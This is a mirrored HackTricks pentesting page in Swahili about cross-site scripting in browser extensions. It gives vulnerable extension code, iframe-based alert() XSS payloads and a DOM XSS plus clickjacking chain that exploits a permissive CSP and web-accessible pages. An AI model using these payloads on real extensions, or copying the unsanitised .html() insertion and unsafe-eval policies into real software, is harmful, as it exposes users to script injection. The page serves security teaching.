maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md

105 lines
5.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# BrowExt - XSS Mfano
{{#include ../../banners/hacktricks-training.md}}
## Uandishi wa Muktadha wa Tovuti (XSS) kupitia Iframe
Katika mpangilio huu, **script ya maudhui** inatekelezwa kuanzisha Iframe, ikijumuisha URL yenye vigezo vya uchunguzi kama chanzo cha Iframe:
```javascript
chrome.storage.local.get("message", (result) => {
let constructedURL =
chrome.runtime.getURL("message.html") +
"?content=" +
encodeURIComponent(result.message) +
"&redirect=https://example.net/details"
frame.src = constructedURL
})
```
Ukurasa wa HTML unaopatikana kwa umma, **`message.html`**, umeundwa kuongeza maudhui kwa njia ya kidinamikia kwenye mwili wa hati kulingana na vigezo vilivyomo kwenye URL:
```javascript
$(document).ready(() => {
let urlParams = new URLSearchParams(window.location.search)
let userContent = urlParams.get("content")
$(document.body).html(
`${userContent} <button id='detailBtn'>Details</button>`
)
$("#detailBtn").on("click", () => {
let destinationURL = urlParams.get("redirect")
chrome.tabs.create({ url: destinationURL })
})
})
```
Script mbaya inatekelezwa kwenye ukurasa wa adui, ikibadilisha parameter ya `content` ya chanzo cha Iframe kuingiza **XSS payload**. Hii inafikiwa kwa kubadilisha chanzo cha Iframe kujumlisha script hatari:
```javascript
setTimeout(() => {
let targetFrame = document.querySelector("iframe").src
let baseURL = targetFrame.split("?")[0]
let xssPayload = "<img src='invalid' onerror='alert(\"XSS\")'>"
let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`
document.querySelector("iframe").src = maliciousURL
}, 1000)
```
Sera ya Usalama wa Maudhui inayoruhusu kupita kiasi kama:
```json
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"
```
inaruhusu utekelezaji wa JavaScript, na kufanya mfumo kuwa hatarini kwa mashambulizi ya XSS.
Njia mbadala ya kuchochea XSS inahusisha kuunda kipengele cha Iframe na kuweka chanzo chake kujumuisha skripti hatari kama parameta ya `content`:
```javascript
let newFrame = document.createElement("iframe")
newFrame.src =
"chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" +
encodeURIComponent("<img src='x' onerror='alert(\"XSS\")'>")
document.body.append(newFrame)
```
## DOM-based XSS + ClickJacking
Mfano huu umetolewa kutoka kwenye [original post writeup](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/).
Tatizo kuu linatokana na udhaifu wa Cross-site Scripting (XSS) unaotokana na DOM ulio katika **`/html/bookmarks.html`**. JavaScript yenye matatizo, sehemu ya **`bookmarks.js`**, imeelezwa hapa chini:
```javascript
$("#btAdd").on("click", function () {
var bookmarkName = $("#txtName").val()
if (
$(".custom-button .label").filter(function () {
return $(this).text() === bookmarkName
}).length
)
return false
var bookmarkItem = $('<div class="custom-button">')
bookmarkItem.html('<span class="label">' + bookmarkName + "</span>")
bookmarkItem.append('<button class="remove-btn" title="delete">x</button>')
bookmarkItem.attr("data-title", bookmarkName)
bookmarkItem.data("timestamp", new Date().getTime())
$("section.bookmark-container .existing-items").append(bookmarkItem)
persistData()
})
```
Hii snippet inapata **thamani** kutoka kwa **`txtName`** input field na inatumia **mchanganyiko wa nyuzi kuunda HTML**, ambayo kisha inaongezwa kwenye DOM kwa kutumia jQuerys `.append()` function.
Kwa kawaida, Sera ya Usalama wa Maudhui (CSP) ya nyongeza ya Chrome ingepunguza udhaifu kama huu. Hata hivyo, kutokana na **kuondolewa kwa CSP na unsafe-eval** na matumizi ya mbinu za usimamizi wa DOM za jQuery (ambazo zinatumia [`globalEval()`](https://api.jquery.com/jquery.globaleval/) kupitisha scripts kwa [`eval()`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) wakati wa kuingiza DOM), unyakuzi bado unawezekana.
Ingawa udhaifu huu ni muhimu, unyakuzi wake kwa kawaida unategemea mwingiliano wa mtumiaji: kutembelea ukurasa, kuingiza mzigo wa XSS, na kuamsha kitufe cha “Ongeza”.
Ili kuboresha udhaifu huu, udhaifu wa pili wa **clickjacking** unatumika. Manifest ya nyongeza ya Chrome inaonyesha sera kubwa ya `web_accessible_resources`:
```json
"web_accessible_resources": [
"html/bookmarks.html",
"dist/*",
"assets/*",
"font/*",
[...]
],
```
Kwa hakika, ukurasa wa **`/html/bookmarks.html`** unakabiliwa na framing, hivyo ni hatarini kwa **clickjacking**. Uthibitisho huu unatumika kuunda fremu ya ukurasa ndani ya tovuti ya mshambuliaji, ukiweka juu yake vipengele vya DOM ili kubadilisha muonekano kwa njia ya udanganyifu. Manipulatio hii inawafanya waathirika kuingiliana na nyongeza ya msingi bila kukusudia.
## Marejeo
- [https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/](https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/)
- [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink